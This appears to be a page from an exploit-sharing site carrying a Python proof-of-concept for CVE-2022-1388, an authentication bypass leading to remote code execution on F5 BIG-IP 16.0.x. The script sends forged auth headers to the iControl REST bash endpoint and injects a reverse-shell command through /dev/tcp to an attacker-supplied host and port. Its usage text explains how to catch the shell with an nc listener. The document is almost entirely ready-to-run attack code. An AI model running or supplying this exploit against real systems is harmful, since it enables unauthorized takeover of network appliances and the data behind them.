扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' __________________ ___ ______ __ ____ ___ ___ / ____\ \/ /____||__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \/ /| |__ ______ ) | | | | ) |) |_____| | __) | (_) | (_) | | |\ \/ / |__|______/ /| | | |/ // /______| ||__ < > _ < > _ < | |____ \/| |____/ /_| |_| / /_ / /_| |___) | (_) | (_) | \_____| \/ |______||____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3]) |
体验盒子
